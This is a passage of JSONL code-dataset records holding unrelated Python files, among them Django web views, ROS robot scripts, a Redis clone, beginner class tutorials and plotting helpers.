database_id)\n proteins_str = get_formatted_data(analysis.metadata, 'proteins_str', None)\n compounds_str = get_formatted_data(analysis.metadata, 'compounds_str', None)\n elif data_type == PROTEOMICS:\n genes_str = get_formatted_data(analysis.metadata, 'genes_str', None)\n proteins_str = get_formatted_data(analysis.metadata, 'proteins_str', database_id)\n compounds_str = get_formatted_data(analysis.metadata, 'compounds_str', None)\n elif data_type == METABOLOMICS:\n genes_str = get_formatted_data(analysis.metadata, 'genes_str', None)\n proteins_str = get_formatted_data(analysis.metadata, 'proteins_str', None)\n compounds_str = get_formatted_data(analysis.metadata, 'compounds_str', database_id)\n\n metabolic_pathway_only = True\n results = reactome_mapping(request, genes_str, proteins_str, compounds_str, COMPOUND_DATABASE_KEGG,\n species_list, metabolic_pathway_only)\n\n # update analysis data\n counts = collections.defaultdict(int)\n for k, r in DataRelationType:\n analysis_data = AnalysisData.objects.filter(analysis=analysis, data_type=k).first()\n if analysis_data is not None:\n new_json_data = json.loads(results[k])\n for item in new_json_data: # add the new data\n if item not in analysis_data.json_data:\n analysis_data.json_data.append(item)\n counts[r] += 1\n analysis_data.save()\n print('Updated analysis data', analysis_data.pk, 'for analysis', analysis.pk)\n\n # update species in analysis metadata\n species_list = list(set(analysis.get_species_list() + species_list))\n analysis.metadata['species_list'] = species_list\n analysis.save()\n\n count = 1\n print('Updated analysis', analysis.pk, '(', species_list, ')')\n messages.success(request, 'Add new data successful.', extra_tags='primary')\n s = pprint.pformat(dict(counts))\n messages.add_message(request, messages.DEBUG, 'Total records updated {0}'.format(s), extra_tags='secondary')\n else:\n messages.warning(request, 'Add new data failed.')\n\n return settings(request, analysis_id)\n\n\ndef get_formatted_data(metadata, key, database_id):\n if len(metadata[key]) == 0: # nothing stored in the metadata\n header_line = 'identifier'\n if database_id is not None:\n new_str = header_line + '\\n' + database_id\n else:\n new_str = header_line + '\\n' + ''\n\n else: # we 
found something\n        header_line = metadata[key].splitlines()[0]\n        toks = header_line.split(',')\n        if database_id is not None:\n            vals = [database_id] + [','] * (len(toks)-1)\n            assert(len(toks) == len(vals))\n            new_str = header_line + '\\n' + ''.join(vals)\n        else:\n            new_str = header_line + '\\n'\n    return new_str","sub_path":"web_omics/linker/views/settings_view.py","file_name":"settings_view.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639960263","text":"from menu import Menu\n\n\ndef main():\n    \"\"\"\n    Creates a tamagotchi and lets the user take care of it and interact with it.\n    \"\"\"\n    Menu.welcome()\n    Menu.prompt_user()\n    number_input = int(input())\n    if number_input == 1:\n        Menu.create_tamagochi()\n    else:\n        print(\"Sorry to hear that...\")\n        exit()\n    while True:\n        Menu.show_options()\n        option_input = int(input())\n        if option_input == 1:\n            Menu.show_status()\n        elif option_input == 2:\n            print(\"\\nWhich food would you like to give?\")\n            print(\"1. Apple\")\n            print(\"2. Orange\")\n            print(\"3. Kiwi\\n\")\n            food_input = int(input())\n            Menu.feed_food(food_input)\n        elif option_input == 3:\n            Menu.play()\n        elif option_input == 4:\n            Menu.give_medicine()\n        else:\n            print(\"Invalid Input! Try again!\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Assignments/assignment1/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"12456746","text":"# A simple critter\n# Demonstrates the simplest class and object\nclass Critter(object):\n    \"\"\"A virtual pet\"\"\"\n    def talk(self):\n        print(\"Hi. I'm a critter - an instance of a class\")\n\n\ncrit = Critter()\ncrit.talk()\n\n# A critter with a constructor\n# Demonstrates a constructor\nclass Critter(object):\n    \"\"\"A virtual pet\"\"\"\n    def __init__(self):\n        print(\"A new critter has appeared\")\n    def talk(self):\n        print(\"\\nHi. I'm a critter - an instance of the Critter class.\")\n# main part\ncrit1 = Critter()\ncrit2 = Critter()\ncrit1.talk()\ncrit2.talk()\n\n# A critter with attributes\n# Demonstrates creating object attributes and accessing them\nclass Critter(object):\n    \"\"\"A virtual pet\"\"\"\n    def __init__(self, name):\n        print(\"A new critter has been born\")\n        self.name = name\n    def __str__(self):\n        rep = \"An object of class Critter\\n\"\n        rep += \"name: \" + self.name + \"\\n\"\n        return rep\n    def talk(self):\n        print(\"Hi. 
My name is\", self.name, \"\\n\")\n    \ncrit1 = Critter(\"Bobik\")\ncrit1.talk()\ncrit2 = Critter(\"Murzik\")\ncrit2.talk()\nprint(\"Printing the object crit1 to the screen:\")\nprint(crit1)\nprint(\"Direct access to the attribute crit1.name\")\nprint(crit1.name)\n\n# A class-conscious critter\n# Demonstrates class attributes and static methods\nclass Critter(object):\n    \"\"\"A virtual pet\"\"\"\n    total = 0\n    @staticmethod\n    def status():\n        print(\"\\nTotal critters right now:\", Critter.total)\n    def __init__(self, name):\n        print(\"A new critter has been born!\")\n        self.name = name\n        Critter.total += 1\n# main part\nprint(\"Getting the value of the class attribute Critter.total:\", end=\" \")\nprint(Critter.total)\nprint(\"\\nCreating critters.\")\ncrit1 = Critter(\"critter 1\")\ncrit2 = Critter(\"critter 2\")\ncrit3 = Critter(\"critter 3\")\nCritter.status()\nprint(\"\\nAccessing the class attribute through an object:\")\nprint(crit1.total)\n\n\n# A private critter\n# Demonstrates private variables and methods\nclass Critter1(object):\n    \"\"\"A virtual pet\"\"\"\n    def __init__(self, name, mood):\n        print(\"A new critter has been born\")\n        self.name = name # public attribute\n        self.__mood = mood # private attribute\n    def talk(self):\n        print(\"\\nMy name is\", self.name)\n        print(\"Right now I'm feeling\", self.__mood, \"\\n\")\n    def __private_method(self):\n        print(\"This is a private method.\")\n    def public_method(self):\n        print(\"This is a public method\")\n        self.__private_method()\n    \n# main part\ncreature = Critter1(\"Bobik\",\"wonderful\")\ncreature.talk()\ncreature.public_method()\ncreature._Critter1__private_method()\nprint(creature.name)\n\n\n# A critter with properties\n# Demonstrates properties\nclass Critter(object):\n    \"\"\"A virtual pet\"\"\"\n    def __init__(self, name):\n        print(\"A new critter has been born!\")\n        self.__name = name\n    @property # a property is an object with methods that give indirect\n    # access to attributes, and often restrict such indirect access in some way\n    def name(self):\n        return self.__name\n    @name.setter # a decorator marking the method below as the one that\n    # sets a new value of the name property; the setter has the same name as the property\n    def name(self, new_name):\n        if new_name == \"\":\n            print(\"A critter's name cannot be an empty string\")\n        else:\n            self.__name = new_name\n            print(\"The name was changed successfully\")\n    def talk(self):\n        print(\"\\nHi, my name is\", self.name)\n\ncreit = Critter(\"Bobik\")\ncreit.talk()\nprint(\"My critter's name is\", creit.name)\nprint(\"Trying to change the name to Murzik\")\ncreit.name = \"Murzik\"\nprint(\"My critter's name is\", creit.name)\nprint(\"Trying to change the name to an empty string\")\ncreit.name = \"\"\nprint(\"My critter's name is\", creit.name)\n","sub_path":"Майкл Доусон \"Программируем на Python\"/Unit8.py","file_name":"Unit8.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"462188664","text":"#!/usr/bin/env python3\nimport rospy\nfrom nav_msgs.msg import Odometry\nimport tf2_ros\nimport tf2_geometry_msgs\nimport geometry_msgs.msg\n\n\ndef odom_received(odom):\n    global tfBroadcaster\n    global tfBuffer\n    global odom_publisher\n    global counter\n\n    base_link_to_zed_left_camera_optical_frame = tfBuffer.lookup_transform('base_link', 'zed_left_camera_optical_frame', rospy.Time())\n\n    translation = geometry_msgs.msg.Vector3Stamped()\n    translation.header.frame_id = 
'zed_left_camera_optical_frame'\n translation.vector = odom.pose.pose.position\n translation_base_link = tf2_geometry_msgs.do_transform_vector3(translation, base_link_to_zed_left_camera_optical_frame)\n\n rotation_vector = geometry_msgs.msg.Vector3Stamped()\n rotation_vector.header.frame_id = 'zed_left_camera_optical_frame'\n rotation_vector.vector.x = odom.pose.pose.orientation.x\n rotation_vector.vector.y = odom.pose.pose.orientation.y\n rotation_vector.vector.z = odom.pose.pose.orientation.z\n rotation_vector_base_link = tf2_geometry_msgs.do_transform_vector3(rotation_vector, base_link_to_zed_left_camera_optical_frame)\n\n odom_pose_base_link = geometry_msgs.msg.PoseStamped()\n odom_pose_base_link.pose.position = translation_base_link.vector\n odom_pose_base_link.pose.orientation.x = rotation_vector_base_link.vector.x\n odom_pose_base_link.pose.orientation.y = rotation_vector_base_link.vector.y\n odom_pose_base_link.pose.orientation.z = rotation_vector_base_link.vector.z\n odom_pose_base_link.pose.orientation.w = odom.pose.pose.orientation.w\n \n odom_pose_base_link.pose.position.y += counter * 0.005\n counter += 1\n\n odom_to_base_link = geometry_msgs.msg.TransformStamped()\n odom_to_base_link.header.stamp = odom.header.stamp\n odom_to_base_link.header.frame_id = 'odom'\n odom_to_base_link.child_frame_id = 'base_link'\n odom_to_base_link.transform.translation = odom_pose_base_link.pose.position\n odom_to_base_link.transform.rotation = odom_pose_base_link.pose.orientation\n tfBroadcaster.sendTransform(odom_to_base_link)\n\n odom_base_link = odom\n odom_base_link.header.frame_id = 'odom'\n odom_base_link.pose.pose = odom_pose_base_link.pose\n odom_publisher.publish(odom_base_link)\n\n\nif __name__ == '__main__':\n rospy.init_node('openvslam_odom_to_base_link_with_drift')\n counter = 0\n tfBroadcaster = tf2_ros.TransformBroadcaster()\n tfBuffer = tf2_ros.Buffer()\n tfListener = tf2_ros.TransformListener(tfBuffer)\n rospy.Subscriber('/OpenVSLAM/odom', Odometry, odom_received)\n odom_publisher = rospy.Publisher('/OpenVSLAM/odom_base_link_with_drift', Odometry, queue_size=10)\n rospy.spin()\n \n","sub_path":"occupancy_grid_mapping/rtabmap_example/scripts/openvslam_odom_to_base_link_with_drift.py","file_name":"openvslam_odom_to_base_link_with_drift.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"327293556","text":"#!/usr/bin/env python\n# import roslib;roslib.load_manifest('dynamixel_tutorials')\nimport roslib;roslib.load_manifest('conbe')\nimport rospy\nfrom std_msgs.msg import Float64\nimport time\n\n\n#need to get current position of moter in radians\n\nif __name__ ==\"__main__\":\n rospy.init_node(\"Publisher\")\n pub = rospy.Publisher('/joint2_controller/command', Float64)\n r = rospy.Rate(10)\n\n def dxl_move(start,stop):\n if(start < stop):\n for deg in range (start,stop):\n print('control : ',deg, '[deg]')\n int = deg*3.14/180 #Converting degrees to radians.\n pub.publish(int)\n r.sleep()\n else:\n for deg in range(start-stop):\n print('control : ',start-deg, '[deg]')\n int = (start-deg)*3.14/180 #Converting degrees to radians.\n pub.publish(int)\n r.sleep()\n\n def dxl_move_goal(deg):\n print('control : ',deg, '[deg]')\n int = deg*3.14/180 #Converting degrees to radians.\n pub.publish(int)\n r.sleep()\n\n\n if not rospy.is_shutdown():\n # dxl_move(0,10)\n # time.sleep(5)\n # dxl_move(45,-45)\n # dxl_move(-45,45)\n\n dxl_move_goal(0)\n time.sleep(3)\n dxl_move_goal(90)\n 
time.sleep(3)\n dxl_move_goal(-90)\n time.sleep(3)\n dxl_move_goal(0)\n\n # counter = -90\n # i=0\n # while (True):\n # int = counter*3.14/180 #Converting degrees to radians.\n # pub.publish(int)\n # #This part ensures that the input is sent continously clockwise and anti-clockwise.\n # if(counter == 90):\n # i = 1\n # break # otherwise infinite roop \n # elif(counter == -90):\n # i=0\n # if(i==1):\n # counter-=1\n # elif(i==0):\n # counter+=1\n # r.sleep()","sub_path":"dynamixel_motor/conbe/scripts/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"37602436","text":"import logging\n\nfrom structures import *\n\nlog = logging.getLogger(__name__)\n\n\ndef redis_set_to_list(dic):\n return [str(x) for _, x in sorted(zip(dic.values(), dic.keys()))]\n\n\nclass MiniRedis(object):\n\n def __init__(self):\n self.db = ThreadSafeDict()\n self.tasks = ThreadSafeDict()\n\n def delete_timer(self, key):\n print(\"deleting key {}\".format(key))\n self.delete(key)\n\n def set(self, key, value, seconds=None):\n if key is None or value is None:\n return ERROR_ARGUMENT\n if seconds is not None:\n try:\n seconds = int(str(seconds))\n except (KeyError, TypeError, ValueError):\n return ERROR_INTEGER\n if seconds < 1:\n return ERROR_EXPIRE\n with self.db as db:\n with self.tasks as tasks:\n if key in tasks:\n tasks[key].cancel()\n del tasks[key]\n db[key] = value\n if seconds is not None:\n new_task = threading.Timer(seconds, self.delete, args=[key])\n new_task.start()\n tasks[key] = new_task\n return OK_VALUE\n\n def get(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n value = db.get(key)\n if isinstance(value, dict):\n return ERROR_WRONG_TYPE\n if value is not None:\n return value\n else:\n return EMPTY_VALUE\n\n def delete(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n if key not in db:\n return 0\n with self.tasks as task:\n if key in task:\n task[key].cancel()\n del task[key]\n del db[key]\n return 1\n\n def db_size(self):\n with self.db as db:\n return len(db)\n\n def incr(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n val = db.get(key)\n if val is None:\n val = 0\n try:\n val = int(str(val)) + 1\n db[key] = str(val)\n return val\n except (KeyError, TypeError, ValueError):\n return ERROR_INTEGER\n\n def zadd(self, key, score, member):\n try:\n score = float(str(score))\n except (KeyError, TypeError, ValueError):\n return ERROR_FLOAT\n if key is None or score is None or member is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n z = {}\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n if member in z:\n val = 0\n else:\n val = 1\n z[member] = score\n db[key] = z\n return val\n\n def zcard(self, key):\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n return 0\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n return len(z)\n\n def zrank(self, key, member):\n if key is None or member is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n return EMPTY_VALUE\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n if member in z:\n return redis_set_to_list(z).index(member)\n else:\n return EMPTY_VALUE\n\n def zrange(self, key, start, stop):\n try:\n start = int(str(start))\n stop = int(str(stop))\n except (KeyError, TypeError, ValueError):\n 
return ERROR_INTEGER\n if key is None:\n return ERROR_ARGUMENT\n with self.db as db:\n z = db.get(key)\n if z is None:\n return EMPTY_LIST\n elif not isinstance(z, dict):\n return ERROR_WRONG_TYPE\n zlist = redis_set_to_list(z)\n size = len(zlist)\n if start < 0:\n start = size + start\n if stop < 0:\n stop = size + stop\n result = zlist[start:stop + 1]\n if not result:\n return EMPTY_LIST\n else:\n return result\n","sub_path":"miniredis/miniredis.py","file_name":"miniredis.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"624280153","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom order.models import *\nfrom product.models import *\nfrom user.models import *\nfrom django.utils.crypto import get_random_string\nfrom django.contrib.auth.decorators import login_required\n\n\n\n# Create your views here.\n@login_required(login_url='/login') # Check login\ndef user(request):\n category = Category.objects.all()\n current_user = request.user # Access User Session information\n profile = UserProfile.objects.get(user_id=current_user.id)\n context = {'category': category,\n 'profile':profile}\n return render(request,'user_profile.html',context)\n\n@login_required(login_url='/login')\ndef addtoshopcart(request,id):\n url = request.META.get('HTTP_REFERER')\n current_user=request.user\n\n checkproduct=Shopcart.objects.filter(product_id=id)\n if checkproduct:\n control = 1\n else:\n control = 0\n\n if request.method == 'POST':\n form = ShopcartForm(request.POST)\n if form.is_valid():\n if control == 1:\n data = Shopcart.objects.get(product_id=id)\n data.quantity += form.cleaned_data['quantity']\n data.save()\n else:\n data = Shopcart()\n data.user_id=current_user.id\n data.product_id = id\n data.quantity = form.cleaned_data['quantity']\n data.save()\n messages.success(request,\"Product added to shop cart successfully\")\n return HttpResponseRedirect(url)\n else:\n if control == 1:\n data = Shopcart.objects.get(product_id=id)\n data.quantity += 1\n data.save()\n else:\n data = Shopcart()\n data.user_id=current_user.id\n data.product_id = id\n data.quantity = 1\n data.save()\n messages.success(request,\"Product added to shop cart successfully\")\n return HttpResponseRedirect(url)\ndef shopcart(request):\n category=Category.objects.all()\n current_user=request.user\n shopcart=Shopcart.objects.filter(user_id=current_user.id)\n total=0\n for rs in shopcart:\n total += rs.product.price * rs.quantity\n context={\n 'category':category,\n 'shopcart':shopcart,\n 'total':total,\n }\n return render(request,'shopcart_products.html',context)\n\n@login_required(login_url='/login')\ndef deletefromcart(request,id):\n Shopcart.objects.filter(id=id).delete()\n messages.success(request,\"Your Item Deleted from Cart.\")\n return HttpResponseRedirect('/shopcart')\ndef orderproduct(request):\n category = Category.objects.all()\n current_user = request.user\n shopcart = Shopcart.objects.filter(user_id=current_user.id)\n total = 0\n for rs in shopcart:\n total += rs.product.price * rs.quantity\n\n if request.method == 'POST': # if there is a post\n form = OrderForm(request.POST)\n #return HttpResponse(request.POST.items())\n if form.is_valid():\n # Send Credit card to bank, If the bank responds ok, continue, if not, show the error\n # ..............\n\n data = Order()\n data.first_name = form.cleaned_data['first_name'] #get product 
quantity from form\n data.last_name = form.cleaned_data['last_name']\n data.address = form.cleaned_data['address']\n data.city = form.cleaned_data['city']\n data.phone = form.cleaned_data['phone']\n data.user_id = current_user.id\n data.total = total\n data.ip = request.META.get('REMOTE_ADDR')\n ordercode= get_random_string(5).upper() # random cod\n data.code = ordercode\n data.save() #\n\n\n for rs in shopcart:\n detail = OrderProduct()\n detail.order_id = data.id # Order Id\n detail.product_id = rs.product_id\n detail.user_id = current_user.id\n detail.quantity = rs.quantity\n\n detail.price = rs.product.price\n\n #detail.variant_id = rs.variant_id\n detail.amount = rs.amount\n detail.save()\n # ***Reduce quantity of sold product from Amount of Product\n #if rs.product.variant=='None':\n product = Product.objects.get(id=rs.product_id)\n product.amount -= rs.quantity\n product.save()\n # else:\n # variant = Variants.objects.get(id=rs.product_id)\n # variant.quantity -= rs.quantity\n # variant.save()\n #************ <> *****************\n\n Shopcart.objects.filter(user_id=current_user.id).delete() # Clear & Delete shopcart\n request.session['cart_items']=0\n messages.success(request, \"Your Order has been completed. Thank you \")\n return render(request, 'completed_order.html',{'ordercode':ordercode,'category': category})\n else:\n messages.warning(request, form.errors)\n return HttpResponseRedirect(\"/order/orderproduct\")\n\n form= OrderForm()\n profile = UserProfile.objects.get(user_id=current_user.id)\n context = {'shopcart': shopcart,\n 'category': category,\n 'total': total,\n 'form': form,\n 'profile': profile,\n }\n return render(request, 'order_form.html', context)\n","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264303472","text":"from collections import defaultdict\r\n\r\n'''\r\nFor example, the list type’s sort method takes an optional key argument\r\nthat’s used to determine each index’s value for sorting.\r\nHere, I sort a list of names based on their lengths by providing a\r\nlambda expression as the key hook:\r\n'''\r\n\r\nnames = ['Socrates', 'Archimedes', 'Plato', 'Aristotle']\r\nnames.sort(key=lambda x: len(x))\r\nprint(names) # ['Plato', 'Socrates', 'Aristotle', 'Archimedes']\r\n\r\ndef log_missing():\r\n print('Key added')\r\n return 0\r\n\r\ncurrent = {'green': 12, 'blue': 3}\r\nincrements = [\r\n ('red', 5),\r\n ('blue', 17),\r\n ('orange', 9),\r\n]\r\nresult = defaultdict(log_missing, current)\r\nprint('Before:', dict(result))\r\nfor key, amount in increments:\r\n result[key] += amount\r\nprint('After: ', dict(result))\r\n\r\n'''\r\nBefore: {'green': 12, 'blue': 3}\r\nKey added\r\nKey added\r\nAfter: {'orange': 9, 'green': 12, 'blue': 20, 'red': 5}\r\n'''\r\n\r\ndef increment_with_report(current, increments):\r\n added_count = 0\r\n\r\n def missing():\r\n nonlocal added_count # Stateful closure\r\n added_count += 1\r\n return 0\r\n\r\n result = defaultdict(missing, current)\r\n for key, amount in increments:\r\n result[key] += amount\r\n\r\n return result, added_count\r\n\r\nresult, count = increment_with_report(current, increments)\r\nassert count == 2\r\n\r\n'''\r\nThe problem with defining a closure for stateful hooks is that it’s harder\r\nto read than the stateless function example. 
Another approach is\r\nto define a small class that encapsulates the state you want to track.\r\n'''\r\n\r\nclass CountMissing(object):\r\n    def __init__(self):\r\n        self.added = 0\r\n\r\n    def missing(self):\r\n        self.added += 1\r\n        return 0\r\n\r\ncounter = CountMissing()\r\nresult = defaultdict(counter.missing, current) # Method ref\r\n\r\nfor key, amount in increments:\r\n    result[key] += amount\r\nassert counter.added == 2\r\n\r\n# but not clear\r\n\r\n# Python allows classes to define the __call__ special method.\r\n# __call__ allows an object to be called just like a function.\r\n# It also causes the callable built-in function to return True for such an instance.\r\n\r\nclass BetterCountMissing(object):\r\n    def __init__(self):\r\n        self.added = 0\r\n\r\n    def __call__(self):\r\n        self.added += 1\r\n        return 0\r\n\r\ncounter = BetterCountMissing()\r\ncounter()\r\nassert callable(counter)\r\n\r\ncounter = BetterCountMissing()\r\nresult = defaultdict(counter, current) # Relies on __call__\r\nfor key, amount in increments:\r\n    result[key] += amount\r\nassert counter.added == 2\r\n\r\n# It provides a strong hint that the goal of the class is to act as a stateful closure.\r\n\r\n# When you need a function to maintain state, consider defining a class that\r\n# provides the __call__ method instead of defining a stateful closure\r\n","sub_path":"TUTORIAL_CODE/044_accept_functions_instead_of_classes_also_defaultdict_call_method.py","file_name":"044_accept_functions_instead_of_classes_also_defaultdict_call_method.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135392762","text":"import pandas as pd\nimport folium\nimport numpy as np\n\n\nplotholes=pd.read_csv('./templates/potholes.csv.html',index_col=None)\nlocations=[]\ncolumns=['image','latitude','longitude','depth','width','location','fixed']\n\nfor index,row in plotholes.iterrows(): \n    location = [float(row[2]), float(row[3])]\n    locations.append(location)\n# center the map on the mean of all pothole coordinates\nplothole_map = folium.Map(location=[np.mean([loc[0] for loc in locations]),np.mean([loc[1] for loc in locations])],zoom_start=16.5)\n#create a marker for each pothole\nfor index,row in plotholes.iterrows(): \n    location = [float(row[2]), float(row[3])] \n    popup_string=''\n    for i in range(4,8):\n        popup_string+=columns[i-1]+': '+str(row[i])+'<br>
'\n        popup = folium.Popup(popup_string,max_width=450)\n        marker = folium.Marker(location = location, popup=popup) \n        marker.add_to(plothole_map)\n\nplothole_map.save(\"./templates/my.html\")\n","sub_path":"blast.py","file_name":"blast.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"582351359","text":"from math import *\r\n\r\n\r\ndef actualise(R,v,position,obj,orientation,deltat,amaxlat,epsilonmax,amax,amin,tsb,l,vmax,N):\r\n    #compute the true curvature radius\r\n    R=abs(R)\r\n    Rprim=max(R,tsb*v**2/(epsilonmax*2*pi/360)+l/(epsilonmax*2*pi/360),sqrt(v**2/amaxlat))\r\n    xobj=obj[0]\r\n    yobj=obj[1] \r\n    \r\n    #compute the coordinates of the point reached after deltat, in the lidar frame\r\n    xprim=0\r\n    yprim=0\r\n    xprim1=0\r\n    yprim1=0\r\n    thetaparc=0\r\n    if v!=0:\r\n        thetaparc=atan(xobj/(Rprim-abs(yobj)))\r\n        yprim=Rprim*(1-cos(thetaparc))\r\n        xprim=(Rprim-yprim)*sin(thetaparc)\r\n    \r\n    if yobj<0:\r\n        yprim=-yprim\r\n    \r\n    #debugging\r\n    #thetaparc=atan(yobj/xobj)\r\n    #xprim=xobj\r\n    #yprim=yobj \r\n    print('xobj',xobj)\r\n    print('yobj',yobj)\r\n    print('xprim',xprim)\r\n    print('yprim',yprim)\r\n    \r\n    \r\n    \r\n    rprim=sqrt(xprim**2+yprim**2)\r\n    \r\n    alphainc=360/N\r\n    xprim1=rprim*cos(thetaparc+orientation*2*pi/360) #angle correction? \r\n    yprim1=rprim*sin(thetaparc+orientation*2*pi/360)\r\n    \r\n    \r\n    #compute the coordinates of the point reached after deltat, in the absolute frame\r\n    xabs=xprim1+position[0]\r\n    yabs=yprim1+position[1]\r\n    \r\n    positionprim=[xabs,yabs]\r\n    \r\n    #compute the new orientation\r\n    alphainc=360/N\r\n    orientationprim=orientation+thetaparc*360/(2*pi)\r\n    #if obj[1]vmaxr:\r\n        a=min(1,(vmaxr-v)/(deltat*amin))*amin\r\n    \r\n    vprim=min(vmax,v+a*deltat)\r\n    \r\n    return(positionprim,orientationprim,vprim)\r\n    ","sub_path":"voiture-Autonome-2020-2021/code/actualise.py","file_name":"actualise.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"162381907","text":"class Solution:\n    def minReorder(self, n, connections):\n        from collections import defaultdict,deque\n        \n        undirected_graph = defaultdict(list)\n        actual_graph = defaultdict(set)\n\n        for a,b in connections:\n            undirected_graph[a].append(b)\n            undirected_graph[b].append(a)\n            actual_graph[a].add(b) \n        # queue = [(1,0),(4,0)]\n        # queue structure is (node, destination)\n        queue = deque()\n        for node in undirected_graph[0]:\n            queue.append((node,0))\n        # print(queue)\n        res = 0\n        visited = set([0])\n        \n        while queue:\n            current, destination_node = queue.popleft()\n            visited.add(current)\n            if (destination_node not in actual_graph[current]):\n                print(f\"Add edge b/w {current} and {destination_node}\")\n                res += 1\n            for nei in undirected_graph[current]:\n                if nei not in visited:\n                    queue.append((nei, current))\n        return res\n\nobj = Solution()\nprint(obj.minReorder(6,[[0,1],[1,3],[2,3],[4,0],[4,5]]))","sub_path":"1466-Reorder-Routes-to-Make-All-Paths-Lead-to-the-City-Zero.py","file_name":"1466-Reorder-Routes-to-Make-All-Paths-Lead-to-the-City-Zero.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539917755","text":"import os\nimport tqdm\nimport json\nimport imageio\nimport numpy as np\nimport tensorflow as tf\n\nfrom collections import deque\nfrom skimage.transform import resize, rescale\nfrom skimage.measure import compare_ssim as ssim\n\nimport matplotlib.pyplot as plt\n\n# Own libraries and 
modules\nfrom helpers import plotting, summaries, utils\n\n\ndef visualize_distribution(dcn, data, ax=None, title=None):\n\n title = '' if title is None else title+' '\n\n if type(data) is not np.ndarray:\n sample_batch_size = np.min((100, data.count_validation))\n batch_x = data.next_validation_batch(0, sample_batch_size)\n else:\n batch_x = data\n\n # Fetch latent distribution for the current batch\n batch_z = dcn.compress(batch_x)\n batch_z = batch_z.reshape((-1,)).T\n\n # Get current version of the quantization codebook\n codebook = dcn.get_codebook().tolist()\n\n # Find x limits for plotting\n if dcn._h.rounding == 'identity':\n qmax = np.ceil(np.max(np.abs(batch_z)))\n qmin = -qmax\n else:\n qmin = np.floor(codebook[0])\n qmax = np.ceil(codebook[-1])\n\n feed_dict = {dcn.x: batch_x}\n if hasattr(dcn, 'is_training'):\n feed_dict[dcn.is_training] = True\n\n # Get approximation of the soft quantization structures used for entropy estimation\n histogram = dcn.sess.run(dcn.histogram, feed_dict=feed_dict).reshape((-1,))\n histogram = histogram / histogram.max()\n histogram = histogram.reshape((-1)).tolist()\n\n # Create a dense version of the quantization bins\n bin_centers = np.arange(qmin - 1, qmax + 1, 0.1)\n bin_boundaries = np.convolve(bin_centers, [0.5, 0.5], mode='valid')\n bin_centers = bin_centers[1:-1]\n\n # Compute empirical histogram based on latent representation\n hist = np.histogram(batch_z, bins=bin_boundaries, density=True)[0]\n hist = hist / hist.max()\n\n entropy = utils.entropy(batch_z, codebook)\n\n ticks = np.unique(np.round(np.percentile(batch_z, [1, 5, 25, 50, 75, 95, 99])))\n\n if ax is None:\n fig = plt.figure(figsize=(10, 2))\n ax = fig.gca()\n\n ax.set_xlim([qmin - 1, qmax + 1])\n ax.set_xticks(ticks)\n ax.stem(bin_centers, hist, linefmt='r:', markerfmt='r.') # width=bin_centers[1] - bin_centers[0]\n ax.bar(codebook, histogram, width=(codebook[1] - codebook[0]) / 2, color='b', alpha=0.5)\n ax.set_title('{}QLR histogram (H={:.1f})'.format(title, entropy))\n ax.legend(['Quantized values', 'Soft estimate'], loc='upper right')\n\n # Render the plot as a PNG image and return a bitmap array\n return ax.figure\n\n\ndef visualize_codebook(dcn):\n qmin = -2 ** (dcn.latent_bpf - 1) + 1\n qmax = 2 ** (dcn.latent_bpf - 1)\n\n uniform_cbook = np.arange(qmin, qmax + 1)\n codebook = dcn.get_codebook().tolist()\n\n fig = plt.figure(figsize=(10, 1))\n\n for x1, x2 in zip(codebook, uniform_cbook):\n fig.gca().plot([x1, x2], [0, 1], 'k:')\n\n fig.gca().plot(codebook, np.zeros_like(codebook), 'x')\n fig.gca().plot(uniform_cbook, np.ones_like(uniform_cbook), 'ro')\n fig.gca().set_ylim([-1, 2])\n fig.gca().set_xlim([qmin - 1, qmax + 1])\n fig.gca().set_yticks([])\n fig.gca().set_xticks(uniform_cbook)\n\n # Render the plot as a PNG image and return a bitmap array\n return fig\n\n\ndef save_progress(dcn, data, training, out_dir):\n filename = os.path.join(out_dir, 'progress.json')\n\n output_stats = {\n 'training_spec': training,\n 'data': data.summary(),\n 'dcn': {\n 'model': type(dcn).__name__,\n 'args': dcn.get_parameters(),\n 'codebook': dcn.get_codebook().tolist()\n },\n 'performance': dcn.performance,\n }\n\n with open(filename, 'w') as f:\n json.dump(output_stats, f, indent=4)\n\n\ndef 